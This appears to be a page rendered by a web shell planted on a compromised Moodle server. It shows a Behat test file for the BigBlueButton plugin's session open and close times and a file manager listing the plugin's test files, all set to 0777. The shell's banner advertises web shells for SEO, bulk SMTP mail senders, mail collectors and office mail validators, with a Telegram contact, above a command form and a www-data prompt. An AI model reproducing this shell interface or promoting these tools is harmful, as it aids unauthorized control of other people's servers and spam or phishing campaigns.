__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@mod @mod_bigbluebuttonbn
Feature: Manage BigBlueButton session timings
  As a teacher
  I want to set and manage the open and close times for BigBlueButton sessions
  So that I can control when students can join the sessions

  Background:
    Given a BigBlueButton mock server is configured
    And I enable "bigbluebuttonbn" "mod" plugin
    And the following "courses" exist:
      | fullname | shortname |
      | Course 1 | C1        |
    And the following "users" exist:
      | username | firstname | lastname | email                |
      | teacher1 | Teacher   | One      | teacher1@example.com |
      | student1 | Student   | One      | student1@example.com |
    And the following "course enrolments" exist:
      | user     | course | role           |
      | teacher1 | C1     | editingteacher |
      | student1 | C1     | student        |
    And the following "blocks" exist:
      | blockname         | contextlevel | reference | pagetypepattern | defaultregion |
      | calendar_upcoming | System       | 1         | my-index        | side-post     |

  Scenario Outline: Setting and verifying BBB activity open and close times
    Given the following "activities" exist:
      | course | activity        | name  | openingtime   | closingtime   |
      | C1     | bigbluebuttonbn | BBB 1 | <openingtime> | <closingtime> |
    When I am on the "BBB 1" "bigbluebuttonbn activity" page logged in as student1
    And "Join session" "link" <buttonvisibility> exist
    And I should see "Open:"
    And I should see "<openingtime>%A, %d %B %Y##"
    And I should see "Close:"
    And I should see "<closingtime>%A, %d %B %Y##"
    And I am viewing calendar in "month" view
    And I <calendarvisibility> see "BBB 1"
    And I am on site homepage
    And I follow "Dashboard"
    And I <upcomingeventvisibility> see "BBB 1" in the "Upcoming events" "block"

    Examples:
      | openingtime       | closingtime            | calendarvisibility | buttonvisibility | upcomingeventvisibility |
      | ##now +1 minute## | ##now +5 minutes##     | should             | should not       | should                  |
      | ##1 hour ago##    | ##+2 hours##           | should             | should           | should not              |
      | ##yesterday##     | ##yesterday +3 hours## | should not         | should not       | should not              |

Filemanager

Name Type Size Permission Actions
fixtures Folder 0777
add_instance.feature File 2.57 KB 0777
add_instance_in_empty_state.feature File 2.36 KB 0777
behat_mod_bigbluebuttonbn.php File 10.28 KB 0777
bigbluebuttonbn_activity_availability.feature File 2.31 KB 0777
completion.feature File 3.48 KB 0777
edit_instance.feature File 3.06 KB 0777
end_meeting.feature File 4.45 KB 0777
group_mode.feature File 7.95 KB 0777
guest_access.feature File 4.28 KB 0777
join_meeting.feature File 2.97 KB 0777
join_meeting_as_guest.feature File 2.4 KB 0777
lock_settings.feature File 2.99 KB 0777
meeting_roles.feature File 1.78 KB 0777
recordings.feature File 3.85 KB 0777
recordings_import.feature File 6.96 KB 0777
roles.feature File 1.11 KB 0777
room.feature File 2.22 KB 0777
start_meeting.feature File 4.41 KB 0777
subplugins.feature File 5.99 KB 0777
view_presentation.feature File 2.96 KB 0777
Filemanager